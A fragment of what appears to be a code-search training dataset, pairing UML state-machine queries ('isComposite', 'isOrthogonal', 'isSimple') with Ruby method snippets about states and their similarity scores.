"def species_or_lower?\n return false if rank_level.blank?\n\n rank_level <= SPECIES_LEVEL\n end",
"def is_child?\n !is_parent?\n end",
"def backwards?\n remote == ancestor\n end",
"def active_ship?(ship_obj)\n @active_pos.has_value?(ship_obj)\n end",
"def is_current_super_admin?\n if current_admin \n if current_admin.super_admin?\n return true\n else \n return false\n end \n else \n return false\n end \n end",
"def svn?\n is_a?(Subversion) # :-)\n end",
"def in_or_after_state?(test_state)\n return false if test_state.nil? || self.state.nil?\n test_state = test_state.to_sym\n my_state = self.state.to_sym\n\n # Get all the states that are in and after the state we want to check (test_state),\n # and then see if the vehicle's current state is in that list (well, technically in a lazy enumerable).\n Vehicle.aasm.states.lazy.drop_while { |state| state != test_state }.include?(my_state)\n end",
"def superadmin?\n current_user.has_role? :superadmin\n end",
"def active?\n @state.active?\n end",
"def root?\n !parent\n end",
"def terminal_state?\n self.class.terminal_states.include?(@state)\n end",
"def has_state?(v)\n @state[v]\n end"
] |
[
"0.77484745",
"0.708355",
"0.5812886",
"0.56504595",
"0.5633534",
"0.53952336",
"0.537603",
"0.52856153",
"0.52422816",
"0.5228173",
"0.5222996",
"0.52215654",
"0.52214503",
"0.52096343",
"0.5181934",
"0.5152315",
"0.5145117",
"0.51106036",
"0.5055891",
"0.5050865",
"0.5044035",
"0.5028964",
"0.50108004",
"0.50001854",
"0.4989434",
"0.49882555",
"0.49711344",
"0.49667192",
"0.4960488",
"0.4958683",
"0.49459916",
"0.49406853",
"0.49352092",
"0.491942",
"0.49016428",
"0.48815465",
"0.48797515",
"0.4877321",
"0.487261",
"0.48722515",
"0.486008",
"0.48535976",
"0.4834359",
"0.48319545",
"0.48274732",
"0.481934",
"0.481544",
"0.4814802",
"0.48043045",
"0.48026046",
"0.47995523",
"0.4795034",
"0.47867784",
"0.47766724",
"0.4761044",
"0.47518256",
"0.47494712",
"0.47482276",
"0.4748086",
"0.4748086",
"0.4734511",
"0.47282907",
"0.4722288",
"0.47195786",
"0.47177953",
"0.47146335",
"0.47006482",
"0.4700507",
"0.46786627",
"0.46720633",
"0.46625566",
"0.46541405",
"0.46539974",
"0.4652723",
"0.4647001",
"0.46368805",
"0.4635508",
"0.46340263",
"0.46254924",
"0.46182588",
"0.4616567",
"0.46048075",
"0.4595763",
"0.4592187",
"0.45917758",
"0.45892197",
"0.4586389",
"0.4581196",
"0.4577302",
"0.455982",
"0.4551886",
"0.45500132",
"0.45396784",
"0.45221958",
"0.4521462",
"0.45191935",
"0.45172977",
"0.45132604",
"0.45081443",
"0.4493223"
] |
0.82940197
|
0
|
A state with isComposite=true is said to be a composite state. A composite state is a state that contains at least one region. Default value is false.
|
def isComposite
! ! @submachine
end
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def composite?\n false\n end",
"def composite?\n false\n end",
"def composite?; @composite; end",
"def composite?\n !shapes.empty?\n end",
"def composite?; self[:composite]; end",
"def state\n ret = self[:state] || {}\n if game.facts[:contraband] && game.facts[:contraband].include?(card_type)\n ret[:contraband] = true\n end\n return ret\n end",
"def composite!; self[:composite] = true; self; end",
"def state; region; end",
"def composite?\n relation.is_a?(Relation::Composite)\n end",
"def initialize_state?(object); end",
"def define_state_predicate; end",
"def has_state?\n !@states.empty?\n end",
"def is_state?(name)\n @state.include?(name)\n end",
"def state?(state)\n @state == state\n end",
"def final_state?\n current_state == final_state\n end",
"def state?(state)\n @_state == state\n end",
"def has_state?\n !!current_state\n end",
"def stateful?\n true\n end",
"def state_active?(state)\n @states[state][1]\n end",
"def manifestable_state?\n return true unless manages_state?\n workflow_class.manifest_states.include? Array.wrap(state).first.underscore\n end",
"def state?\n usa?\n end",
"def is_primary?\n !is_regional?\n end",
"def add_state(state, value = false)\n @states[state] = [\n factory.composite_state(self.class.name, state),\n value\n ]\n\n classify_state @states[state]\n end",
"def final?\n @finals.include? @state\n end",
"def active?\n @state.active?\n end",
"def new?\n @_state.nil?\n end",
"def ark_mintable_state?\n return false unless manages_state?\n workflow_class.ark_mint_states.include? Array.wrap(state).first&.underscore\n end",
"def isSubmachineState\n ! ! @submachine\n end",
"def state?(state)\n @states.key?(state)\n end",
"def advanced_state?\n @advanced_state.present?\n end",
"def public_readable_state?\n return true unless manages_state?\n workflow_class.public_read_states.include? Array.wrap(state).first.underscore\n end",
"def closed?\n state_name == \"closed\"\n end",
"def active?\n\t\t\tstate == 'active'\n\t\tend",
"def initialized?\n defined?(@state) && @state\n end",
"def primaryChange\n\t\treturn false if @frozen\n\t\tcase @state\n\t\twhen :white\n\t\t\t@state = :black\n\t\twhen :black\n\t\t\t@state = :white\n\t\tend\n\t\treturn true\n\tend",
"def state?(type, name)\n @state.key?(make_key(type, name))\n end",
"def get_state\n return self.state == 't' || self.state == true\n end",
"def in_progress?\n transitive_states.include? status\n end",
"def noncirculating?\n @type['id'] == '2e48e713-17f3-4c13-a9f8-23845bb210a4' ||\n on_reserve? ||\n @location['name'].include?('Non-Circulating')\n end",
"def full?\n !@state.include?(nil)\n end",
"def full_aux?\n @coil_state_normal ? !@aux_state.all? : @aux_state.all?\n end",
"def cluster_enabled_state\n super\n end",
"def draw_checkbox(rect, state)\n r1 = MACL::Surface::Tool.squarify(rect)\n r2 = r1.contract(anchor: 5, amount: 1)\n draw_dark_rect(r1)\n draw_light_rect(r2) if state\n return rect\n end",
"def closed?\n self.state == 'CLOSED'\n end",
"def state?(name)\n @states.include?(name.to_sym)\n end",
"def construction_in_progress?\n !!@node[\"building_construction\"]\n end",
"def operational?\n state == 'operational'\n end",
"def committed?\n @state == :committed\n end",
"def known_states; end",
"def known_states; end",
"def known_states; end",
"def creating?(creating_state=CREATING)\n state == creating_state\n end",
"def has_state?(v)\n @state[v]\n end",
"def has_state?(v)\n @state[v]\n end",
"def creating?\n state == :CREATING\n end",
"def creating?\n state == :CREATING\n end",
"def creating?\n state == :CREATING\n end",
"def creating?\n state == :CREATING\n end",
"def creating?\n state == :CREATING\n end",
"def secondaryChange\n\t\treturn false if @frozen\n\t\tcase @state\n\t\twhen :white\n\t\t\t@state = :cross\n\t\twhen :cross\n\t\t\t@state = :white\n\t\tend\n\t\treturn true\n\tend",
"def operable?\n initialize_description!\n return false if !reachable? || description.hidden?\n description.primary? || description.secondary?\n end",
"def state; end",
"def state; end",
"def state; end",
"def state; end",
"def state; end",
"def state; end",
"def state; end",
"def state; end",
"def states; end",
"def collins_check_can_be_altered?\n collins_osc_state['current_state'] == \"can_be_altered\"\n end",
"def is_active?\n metadata[:inactive].nil? or !metadata[:inactive]\n end",
"def solid?\n @solid\n end",
"def state_group\n state = @current_policy ? @current_policy.tax_state_abbr : @company_info.hq_state\n case state\n when nil\n 'All'\n when 'CA'\n 'California'\n else\n 'non_California'\n end\n end",
"def default_state_class?()\n \"SampleTransferPallet\"\n end",
"def final_state?(curr_state = nil, **)\n next_state(curr_state).blank?\n end",
"def accept_state_of(closure)\r\n closure.each do |set|\r\n if @accept_states.include?(set)\r\n return @accept_states[set] # change this to \"true\" if reverting to crappy system\r\n end\r\n end\r\n return false\r\n end",
"def finalized?\n self.state != STATE_NEW\n end",
"def invisible_testSuccess(c, ci, cv, state)\n @state[COMMITMENT].any? {|terms| terms.size == 4 and terms[0] == c and terms[1] == ci}\nend",
"def has_state?(v)\n@state[v]\nend",
"def get_composite()\n return nil\n end",
"def has_state(name)\n !@_possible_states[name].nil?\n end",
"def needs_surrogate(composite)\n return false if composite_is_reference(composite)\n\n # REVISIT: The following is debatable. If the natural primary key is an ok surrogate, should we inject another?\n return true if @non_reference_composites.include?(composite)\n\n super\n end",
"def workflow_state\n return false unless @curation_concern.respond_to? :workflow_state\n @curation_concern.workflow_state\n end",
"def has_bool_state\n params.require(:state)\n if ! params[:state].in? [\"true\", \"false\"]\n head :bad_request\n end\n params[:state] = ActiveModel::Type::Boolean.new.cast(params[:state])\n end",
"def accept_state?(state)\n @accept.include? state\n end",
"def from_states; end",
"def from_states; end",
"def is_consumable?\n true\n end",
"def canadian?\n\t\t\tprovince = [\"AB\",\"BC\",\"MB\",\"NB\",\"NF\",\"NT\",\"NS\",\"NU\",\"ON\",\"PE\",\"QC\",\"SK\",\"YT\"]\n\t\t\tprovince.include?(state)\n\t\tend",
"def state\n end",
"def is_full\n count(@state.flatten, '-') == 0\n end",
"def enabled_state\n super\n end",
"def enabled_state\n super\n end",
"def enabled_state\n super\n end",
"def enabled_state\n super\n end",
"def enabled_state\n super\n end",
"def enabled_state\n super\n end",
"def leaves?\n false\n end",
"def start_state?\n @state_type == :start\n end"
] |
[
"0.67147475",
"0.67147475",
"0.62915754",
"0.6103282",
"0.6048136",
"0.5974599",
"0.5719796",
"0.55728376",
"0.55474865",
"0.5543379",
"0.54801726",
"0.5466995",
"0.54630053",
"0.54566044",
"0.5449095",
"0.5436063",
"0.54248947",
"0.5377968",
"0.5341084",
"0.53360635",
"0.5328885",
"0.5258216",
"0.5248537",
"0.5245452",
"0.52329874",
"0.5224541",
"0.52124774",
"0.5187074",
"0.51724035",
"0.5165759",
"0.51655173",
"0.5128156",
"0.5121283",
"0.51048046",
"0.50929296",
"0.508698",
"0.50832987",
"0.50541174",
"0.50534654",
"0.5044446",
"0.5039042",
"0.5031975",
"0.50274706",
"0.5027223",
"0.5003451",
"0.49927452",
"0.49764347",
"0.49732563",
"0.497032",
"0.497032",
"0.497032",
"0.49605694",
"0.49589717",
"0.49589717",
"0.4953333",
"0.4953333",
"0.4953333",
"0.4953333",
"0.4953333",
"0.49455908",
"0.49403238",
"0.493942",
"0.493942",
"0.493942",
"0.493942",
"0.493942",
"0.493942",
"0.493942",
"0.493942",
"0.49381533",
"0.49350247",
"0.49330944",
"0.4929072",
"0.49199873",
"0.49199045",
"0.49081147",
"0.49014834",
"0.4877547",
"0.4873927",
"0.48696572",
"0.48598284",
"0.4857682",
"0.48548287",
"0.48531747",
"0.48509404",
"0.48415232",
"0.48413837",
"0.48413837",
"0.4830249",
"0.48286504",
"0.48267525",
"0.48207566",
"0.4809935",
"0.4809935",
"0.4809935",
"0.4809935",
"0.4809935",
"0.4809935",
"0.48091948",
"0.48081928"
] |
0.65872866
|
2
|
A state with isOrthogonal=true is said to be an orthogonal composite state. An orthogonal composite state contains two or more regions. Default value is false.
|
def isOrthogonal
raise Error::NotImplemented, :message => :isOrthogonal, :object => self
end
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def orthogonal?\n @colt_property.isOrthogonal(@colt_matrix)\n end",
"def composite?\n false\n end",
"def composite?\n false\n end",
"def composite?\n !shapes.empty?\n end",
"def fOOrth\r\n end",
"def fOOrth\r\n end",
"def Matrix3dIsOrthogonal(arg0)\n ret = _invoke(1610743911, [arg0], [VT_BYREF | VT_DISPATCH])\n @lastargs = WIN32OLE::ARGV\n ret\n end",
"def orthogonal_with?(a); self.dot(a) == 0; end",
"def interlace_mode?\n @cr[0][7] == 1\n end",
"def shape2d?(o)\n o.range2d? or o.union2d?\nend",
"def shape2d?(o)\n o.range2d? or o.union2d?\nend",
"def atomic?\n puts \"composition is #{self}\" if SY::DEBUG\n puts \"first[0].dimension is #{first[0].dimension}\" if SY::DEBUG\n singular? && first[0].dimension.base?\n end",
"def oblique?\n !right?\n end",
"def orthogonal?(other)\n dot(other) == 0\n end",
"def interlaced?\n !image_ptr[:interlace].zero?\n end",
"def upper_triangular?\n @colt_property.isUpperTriangular(@colt_matrix)\n end",
"def isComposite\n ! ! @submachine\n end",
"def union_shape?(o)\n o.union1d? or o.union2d?\nend",
"def state; region; end",
"def is_connected_east?\r\n return true if @connected_directions.include?(:east)\r\n return false\r\n end",
"def interlaced?\n @interlaced\n end",
"def north\n @state.north(self)\n end",
"def full_aux?\n @coil_state_normal ? !@aux_state.all? : @aux_state.all?\n end",
"def composite?; @composite; end",
"def shape1d?(o)\n o.union1d? or range1d?(o)\nend",
"def prim_shape?(o)\n range1d?(o) or o.range2d?\nend",
"def advanced_state?\n @advanced_state.present?\n end",
"def restriction_commutative?\n ! (partition_left_tautology? && partition_right_tautology?)\n end",
"def shape2d?(x)\n x.range2d? || x.union2d?\nend",
"def unionshape?(x)\n x.union1d? || x.union2d?\nend",
"def initialize_state?(object); end",
"def strictly_upper_triangular?\n @colt_property.isStrictlyUpperTriangular(@colt_matrix)\n end",
"def h?\n @side == :right || @side == :left\n end",
"def compshape?(x)\n unionshape?(x)\nend",
"def is_primary?\n !is_regional?\n end",
"def shape?(o)\n prim_shape?(o) or comp_shape?(o)\nend",
"def set_continuous_collision_state(state)\n state = state ? true : false\n Sketchup.active_model.set_attribute('MSPhysics', 'Continuous Collision Mode', state)\n sim = MSPhysics::Simulation.instance\n sim.set_continuous_collision_state(state) if sim\n return state\n end",
"def clockwise?\n rh_cell.filled? && !lh_cell.filled?\n end",
"def is_plane\n\t\t@angle == 0 || @angle == 180\n\tend",
"def full?\n !@state.include?(nil)\n end",
"def octagonal?\n fcache[:octagonal] ||= (Math.sqrt(3*self +1)+1)% 3 == 0\n end",
"def upper_bidiagonal?\n @colt_property.isUpperBidiagonal(@colt_matrix)\n end",
"def authenticated?()\n\n odd_degree_count = 0;\n\n for i in 0..@number_of_vertices-1 do\n if @adjacent_list[i].length != @indegree[i]\n odd_degree_count += 1\n end\n end\n\n return false if(odd_degree_count!= 0 && odd_degree_count!= 2)\n\n (odd_degree_count == 0 && self.is_eulerian_circuit?) || (odd_degree_count ==2 && self.is_eulerian_path?)\n end",
"def is_full\n count(@state.flatten, '-') == 0\n end",
"def draw_checkbox(rect, state)\n r1 = MACL::Surface::Tool.squarify(rect)\n r2 = r1.contract(anchor: 5, amount: 1)\n draw_dark_rect(r1)\n draw_light_rect(r2) if state\n return rect\n end",
"def define_state_predicate; end",
"def composite?; self[:composite]; end",
"def is_connected_south?\r\n return true if @connected_directions.include?(:south)\r\n return false\r\n end",
"def composite?\n relation.is_a?(Relation::Composite)\n end",
"def final_state?\n current_state == final_state\n end",
"def identity?\n @colt_property.isIdentity(@colt_matrix)\n end",
"def collision_wireframe_visible=(state)\n @debug_collision = state ? true : false\n sim = MSPhysics::Simulation.instance\n sim.collision_wireframe_visible = @debug_collision if sim\n end",
"def triangular?\n @colt_property.isTriangular(@colt_matrix)\n end",
"def final?\n @finals.include? @state\n end",
"def operational?\n state == 'operational'\n end",
"def notional?\n (notional)\n end",
"def test_nad83_state_plane()\n srs = Gdal::Osr::SpatialReference.new()\n srs.set_state_plane(403, 1) # California III NAD83.\n\n parm_list = [\n [Gdal::Osr::SRS_PP_STANDARD_PARALLEL_1, 38.43333333333333],\n [Gdal::Osr::SRS_PP_STANDARD_PARALLEL_2, 37.06666666666667],\n [Gdal::Osr::SRS_PP_LATITUDE_OF_ORIGIN, 36.5],\n [Gdal::Osr::SRS_PP_CENTRAL_MERIDIAN, -120.5],\n [Gdal::Osr::SRS_PP_FALSE_EASTING, 2000000.0],\n [Gdal::Osr::SRS_PP_FALSE_NORTHING, 500000.0]\n ]\n\n parm_list.each() do |parm|\n value = srs.get_proj_parm(parm[0], -1111)\n assert_in_delta(parm[1], value, 0.0000001)\n end\n\n auth_list = [ ['GEOGCS', '4269'],\n ['DATUM', '6269'],\n ['PROJCS', '26943'],\n ['PROJCS|UNIT', '9001']\n ]\n\n auth_list.each() do |auth|\n assert_equal(srs.get_authority_name(auth[0]), 'EPSG')\n assert_equal(srs.get_authority_code(auth[0]), auth[1])\n end\n end",
"def lower_triangular?\n @colt_property.isLowerTriangular(@colt_matrix)\n end",
"def geostationary_orbit\n return Orbit.geostationary_orbit(self)\n end",
"def chomsky_normal_form?\n all? { |r| r.chomsky_normal_form? } \n end",
"def obstructed?(new_x, new_y); end",
"def solid?\n @solid\n end",
"def landscape?\n xy_ratio >= 1\n end",
"def equilateral?\n sides.uniq.size.eql?(1)\n end",
"def full?\n par? && trio?\n end",
"def initialized?\n defined?(@state) && @state\n end",
"def state_active?(state)\n @states[state][1]\n end",
"def aabb_visible=(state)\n @debug_aabb = state ? true : false\n sim = MSPhysics::Simulation.instance\n sim.aabb_visible = @debug_aabb if sim\n end",
"def unit_triangular?\n @colt_property.isUnitTriangular(@colt_matrix)\n end",
"def operable?\n initialize_description!\n return false if !reachable? || description.hidden?\n description.primary? || description.secondary?\n end",
"def is_on_floor_bottom\n return Sketchup.active_model.get_attribute(\"GeoReference\", \"onOceanFloor\") == \"true\";\nend",
"def tridiagonal?\n @colt_property.isTridiagonal(@colt_matrix)\n end",
"def squaragonal?(grid)\n diagnoal?(grid) || diagnoal?(grid.reverse)\nend",
"def strictly_triangular?\n @colt_property.isStrictlyTriangular(@colt_matrix)\n end",
"def challenge_open?(division)\n get_state(division).eql? 'open'\n end",
"def orientation\n p1, p2, p3 = *convex_sub_polygon\n det = (p2[0]-p1[0])*(p3[1]-p1[1]) - (p3[0]-p1[0])*(p2[1]-p1[1])\n @orientation ||= (det < 0)? 1 : -1\n end",
"def atlas_visible?\n return quality_checked? && open_access? && geom?\n end",
"def is_solution?(bucket_state)\n return bucket_state == @instance.final_capacities\n end",
"def has_state?\n !@states.empty?\n end",
"def same_land?(other)\n land == other.land\n end",
"def primshape?(x)\n x.range1d? || x.range2d?\nend",
"def is_closed?\n return @polygon_points.first == @polygon_points.last\n end",
"def is_closed?\n return @polygon_points.first == @polygon_points.last\n end",
"def axes_visible=(state)\n @debug_axes = state ? true : false\n sim = MSPhysics::Simulation.instance\n sim.axes_visible = @debug_axes if sim\n end",
"def state\n case [@c2, @c1, @c0]\n when [0,0,0] then \"Z -> Z\"\n when [0,0,1] then \"X + Y\"\n when [0,1,0] then \"rotate x\"\n when [0,1,1] then \"x & y\"\n when [1,0,0] then \"x | y\"\n when [1,0,1] then \"x ^ y\"\n when [1,1,0] then \"~ x\"\n when [1,1,1] then \"x == y\"\n else raise RuntimeError.new \"wrong alu operation: #{ [@c2, @c1, @c0] }\"\n end\n end",
"def or(state)\n OrStatement.new(self, state)\n end",
"def clockwise(a, b, c)\n oriented_area(a, b, c).negative?\n end",
"def state?(state)\n @state == state\n end",
"def ballpark_transformation?\r\n result = Api.proj_coordoperation_has_ballpark_transformation(Context.current, self)\r\n result == 1 ? true : false\r\n end",
"def is_upper_triangular?\n triangular(self.row_vectors)\n end",
"def finalized?\n @layers.none?\n end",
"def lower_bidiagonal?\n @colt_property.isLowerBidiagonal(@colt_matrix)\n end",
"def at_rightmost_side?\n\t\tcl[1] == @map.nr_columns\n\tend",
"def county_and_country_coordinators?\n (merge_roles & COUNTY_COUNTRY_COORDINATORS).empty?\n end",
"def equilateral?\n type == :equilateral\n end",
"def washington_state_resident?\n resident == 1 || resident == 2\n end",
"def composite!; self[:composite] = true; self; end",
"def state?\n usa?\n end",
"def mobocratical_corrivalship?()\n apometaboly_peaklike(oversourly)\n end",
"def sogr?\n (sogr)\n end"
] |
[
"0.6146887",
"0.52151644",
"0.52151644",
"0.51851517",
"0.51488584",
"0.51488584",
"0.51258343",
"0.5104288",
"0.5079847",
"0.5079044",
"0.5079044",
"0.50709265",
"0.50416905",
"0.50009125",
"0.49915877",
"0.49877498",
"0.49842927",
"0.49645686",
"0.49493575",
"0.48900872",
"0.48831347",
"0.48710206",
"0.48655987",
"0.48110998",
"0.47949833",
"0.47845235",
"0.47727215",
"0.4743478",
"0.47371417",
"0.47320604",
"0.47219333",
"0.47182527",
"0.46999297",
"0.46974558",
"0.4679195",
"0.4650204",
"0.46196824",
"0.46098563",
"0.46049488",
"0.4592325",
"0.45850152",
"0.4574279",
"0.4565682",
"0.45645848",
"0.45614892",
"0.45570797",
"0.45528388",
"0.4547303",
"0.45359585",
"0.453261",
"0.45281053",
"0.4527189",
"0.45259777",
"0.45239764",
"0.4519789",
"0.45185643",
"0.44995156",
"0.44988847",
"0.44986695",
"0.44979057",
"0.4496452",
"0.44915545",
"0.44740015",
"0.4473668",
"0.44713262",
"0.44681504",
"0.44627038",
"0.44591168",
"0.4454834",
"0.44483522",
"0.44431826",
"0.44418058",
"0.44288856",
"0.4427853",
"0.44186938",
"0.4415485",
"0.4414596",
"0.44128916",
"0.44090828",
"0.44013208",
"0.43971282",
"0.43940997",
"0.43940997",
"0.4390161",
"0.4385799",
"0.43810198",
"0.43779874",
"0.4376094",
"0.4375505",
"0.43748602",
"0.43747255",
"0.43725753",
"0.43658754",
"0.4349302",
"0.43441123",
"0.43438712",
"0.43337253",
"0.43304121",
"0.43273103",
"0.4325254"
] |
0.66913474
|
0
|
A state with isSimple=true is said to be a simple state. A simple state does not have any regions and it does not refer to any submachine state machine. Default value is true.
|
def isSimple
raise Error::NotImplemented, :message => :isSimple, :object => self
end
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def start_state?\n @state_type == :start\n end",
"def get_state\n return self.state == 't' || self.state == true\n end",
"def simple?\n true\n end",
"def stateful?\n true\n end",
"def state?\n usa?\n end",
"def boolean!\n # -> uncomment the next line to manually enable rule tracing\n # trace_in( __method__, 16 )\n\n\n\n type = BOOLEAN\n channel = ANTLR3::DEFAULT_CHANNEL\n # - - - - label initialization - - - -\n\n\n # - - - - main rule block - - - -\n # at line 37:10: 'estado'\n match( \"estado\" )\n\n\n\n @state.type = type\n @state.channel = channel\n ensure\n # -> uncomment the next line to manually enable rule tracing\n # trace_out( __method__, 16 )\n\n\n end",
"def define_state_predicate; end",
"def state\n end",
"def is_state?(name)\n @state.include?(name)\n end",
"def state\n self[:ST]\n end",
"def state?(type, name)\n @state.key?(make_key(type, name))\n end",
"def desired_state?\n return true unless options.key?(:desired_state)\n\n options[:desired_state]\n end",
"def test_state_names_2\n simple_dfa = Automaton.new(false) do |fa|\n fa.add_state(:initial => true)\n end\n assert_raise ArgumentError do\n simple_dfa.get_state('') # non-existing state\n end\n end",
"def running?; state == 'running'; end",
"def running?; state == 'running'; end",
"def name\n state_name\n end",
"def has_state?\n !@states.empty?\n end",
"def on?\n state[\"on\"]\n end",
"def state\n object.human_state_name\n end",
"def state?(name)\n @states.include?(name.to_sym)\n end",
"def ark_mintable_state?\n return false unless manages_state?\n workflow_class.ark_mint_states.include? Array.wrap(state).first&.underscore\n end",
"def default_state_class?()\n \"SampleTransferPallet\"\n end",
"def default_state_class?()\n return nil\n end",
"def type_bool!\n # -> uncomment the next line to manually enable rule tracing\n # trace_in( __method__, 37 )\n\n\n\n type = TYPE_BOOL\n channel = ANTLR3::DEFAULT_CHANNEL\n # - - - - label initialization - - - -\n\n\n # - - - - main rule block - - - -\n # at line 213:12: 'bool'\n match( \"bool\" )\n\n\n\n @state.type = type\n @state.channel = channel\n ensure\n # -> uncomment the next line to manually enable rule tracing\n # trace_out( __method__, 37 )\n\n\n end",
"def initial?\n Machine[@target_class].initial_state_name == self.name\n end",
"def initialize_state?(object); end",
"def has_state?\n !!current_state\n end",
"def state_active?(state)\n @states[state][1]\n end",
"def state\n status.state name\n end",
"def state; end",
"def state; end",
"def state; end",
"def state; end",
"def state; end",
"def state; end",
"def state; end",
"def state; end",
"def test_add_state\n Automaton.new(false) do |fa|\n s0 = fa.add_state\n assert_equal(1, fa.state_count)\n assert_equal(false, s0.initial?)\n assert_equal(false, s0.accepting?)\n\n s1 = fa.add_state(:initial => true)\n assert_equal(2, fa.state_count)\n assert_equal(true, s1.initial?)\n assert_equal(false, s1.accepting?)\n\n s2 = fa.add_state(:initial => true, :accepting => true)\n assert_equal(3, fa.state_count)\n assert_equal(true, s2.initial?)\n assert_equal(true, s2.accepting?)\n\n s3 = fa.add_state(:myownkey => \"blambeau\")\n assert_equal(4, fa.state_count)\n assert_equal(false, s3.initial?)\n assert_equal(false, s3.accepting?)\n assert_equal(\"blambeau\", s3[:myownkey])\n\n assert_equal(0, fa.edge_count)\n end\n end",
"def state?(state)\n @states.key?(state)\n end",
"def state?(state)\n @_state == state\n end",
"def state?(state)\n @state == state\n end",
"def true!\n # -> uncomment the next line to manually enable rule tracing\n # trace_in( __method__, 16 )\n\n type = TRUE\n channel = ANTLR3::DEFAULT_CHANNEL\n\n \n # - - - - main rule block - - - -\n # at line 318:8: 'true'\n match( \"true\" )\n\n \n @state.type = type\n @state.channel = channel\n\n ensure\n # -> uncomment the next line to manually enable rule tracing\n # trace_out( __method__, 16 )\n\n end",
"def true!\n # -> uncomment the next line to manually enable rule tracing\n # trace_in( __method__, 57 )\n\n type = TRUE\n channel = ANTLR3::DEFAULT_CHANNEL\n\n \n # - - - - main rule block - - - -\n # at line 178:8: 'true'\n match( \"true\" )\n\n \n @state.type = type\n @state.channel = channel\n\n ensure\n # -> uncomment the next line to manually enable rule tracing\n # trace_out( __method__, 57 )\n\n end",
"def state name, options={}, &block\n valid_unless_nested()\n define_state( name, options, &block )\n end",
"def active?\n\t\t\tstate == 'active'\n\t\tend",
"def state_name\n self.state.name if self.state.name?\n end",
"def boolean!\n # -> uncomment the next line to manually enable rule tracing\n # trace_in( __method__, 28 )\n\n\n\n type = BOOLEAN\n channel = ANTLR3::DEFAULT_CHANNEL\n # - - - - label initialization - - - -\n\n\n # - - - - main rule block - - - -\n # at line 193:8: ( 'true' | 'false' )\n alt_2 = 2\n look_2_0 = @input.peek( 1 )\n\n if ( look_2_0 == 0x74 )\n alt_2 = 1\n elsif ( look_2_0 == 0x66 )\n alt_2 = 2\n else\n raise NoViableAlternative( \"\", 2, 0 )\n\n end\n case alt_2\n when 1\n # at line 193:10: 'true'\n match( \"true\" )\n\n\n when 2\n # at line 193:19: 'false'\n match( \"false\" )\n\n\n end\n\n @state.type = type\n @state.channel = channel\n ensure\n # -> uncomment the next line to manually enable rule tracing\n # trace_out( __method__, 28 )\n\n\n end",
"def states; end",
"def active?\n @state.active?\n end",
"def public_readable_state?\n return true unless manages_state?\n workflow_class.public_read_states.include? Array.wrap(state).first.underscore\n end",
"def toggle_state\n state\n end",
"def request_state(s, *flags) # :args: state, *flags\n return true if @_hegemon_state==s\n return false unless @_hegemon_states[@_hegemon_state].transitions[s]\n @_hegemon_states[@_hegemon_state].transitions[s].try(*flags)\n end",
"def has_state?(v)\n @state[v]\n end",
"def has_state?(v)\n @state[v]\n end",
"def new?\n @_state.nil?\n end",
"def state=(s)\n @state = s\n end",
"def waitingsecond?\n state_name == \"waitingsecond\"\n end",
"def state\n @state\n end",
"def known_states; end",
"def known_states; end",
"def known_states; end",
"def running?\n @state == :running\n end",
"def define_state_method(state)\n return if machine.respond_to?(\"#{state}?\")\n machine.send(:define_singleton_method, \"#{state}?\") do\n machine.is?(state.to_sym)\n end\n end",
"def isSubmachineState\n ! ! @submachine\n end",
"def state\n self.well_info.state\n end",
"def state(name, &block)\n raise ArgumentError, \"The state name must respond to `to_sym`\" unless name.respond_to?(:to_sym)\n name = name.to_sym\n state_configuration(name).instance_eval &block\n \n raise \"You must provide a start state for #{name}\" unless state_configuration(name).start_state\n\n define_method(name) { state_container name }\n end",
"def state=(value)\n @state = value\n end",
"def state\n @state\n end",
"def test_state_names_1\n s0,s1,s2 = nil,nil,nil\n simple_dfa = Automaton.new(false) do |fa|\n s0 = fa.add_state(:initial => true, :name => 'A')\n s1 = fa.add_state(:accepting => true, :name => 'B')\n s2 = fa.add_state(:name => 'C')\n fa.connect(s0, s1, 'a')\n fa.connect(s1, s1, 'b')\n fa.connect(s1, s2, 'c')\n end\n assert_raise ArgumentError do\n simple_dfa.get_state(56) # wrong type\n end\n assert_raise ArgumentError do\n simple_dfa.get_state('T') # non-existing name\n end\n\n assert_raise ArgumentError do\n simple_dfa.get_state('') # non-existing state\n end\n\n assert_raise ArgumentError do\n simple_dfa.get_state(nil) # nil name\n end\n assert_equal s0,simple_dfa.get_state('A')\n assert_equal s1,simple_dfa.get_state('B')\n assert_equal s2,simple_dfa.get_state('C')\n end",
"def advanced_state?\n @advanced_state.present?\n end",
"def has_state?(v)\n@state[v]\nend",
"def stp_enabled_state\n super\n end",
"def has_bool_state\n params.require(:state)\n if ! params[:state].in? [\"true\", \"false\"]\n head :bad_request\n end\n params[:state] = ActiveModel::Type::Boolean.new.cast(params[:state])\n end",
"def perform_initial_transition?\n !current_state\n end",
"def aasm_read_state(_name = :default)\n state.try(:to_sym).presence || self.class.aasm.initial_state\n end",
"def toggle_state\n puts \"******* toggle_state *******\"\n end",
"def state\n @state\n end",
"def state \n :empty\n end",
"def state\n @state.blank? ? nil : @state\n end",
"def define_state_predicate\n name = self.name\n \n # Still use class_eval here instance of define_instance_method since\n # we need to be able to call +super+\n @instance_helper_module.class_eval do\n define_method(\"#{name}?\") do |*args|\n args.empty? ? super(*args) : self.class.state_machine(name).states.matches?(self, *args)\n end\n end\n end",
"def basic?\n false\n end",
"def is_state_machine(options = {}, &block)\n extend DataMapper::Is::StateMachine::EventDsl\n extend DataMapper::Is::StateMachine::StateDsl\n include DataMapper::Is::StateMachine::InstanceMethods\n\n # ===== Setup context =====\n options = { :column => :state, :initial => nil }.merge(options)\n column = options[:column]\n initial = options[:initial].to_s\n unless properties.detect { |p| p.name == column }\n property column, String, :default => initial\n end\n machine = Data::Machine.new(column, initial)\n @is_state_machine = { :machine => machine }\n\n # ===== Define callbacks =====\n # TODO: define callbacks\n # before :save do\n # if self.new_record?\n # # ...\n # else\n # # ...\n # end\n # end\n\n before :destroy do\n # Do we need to do anything here?\n end\n\n # ===== Setup context =====\n push_state_machine_context(:is)\n\n yield if block_given?\n\n # ===== Teardown context =====\n pop_state_machine_context\n end",
"def enabled_state\n super\n end",
"def enabled_state\n super\n end",
"def enabled_state\n super\n end",
"def enabled_state\n super\n end",
"def enabled_state\n super\n end",
"def enabled_state\n super\n end",
"def state_label\n self.state == 3 ? \"Confirmado\" : \"Borrador\"\n end",
"def note_state\n state if note\n end",
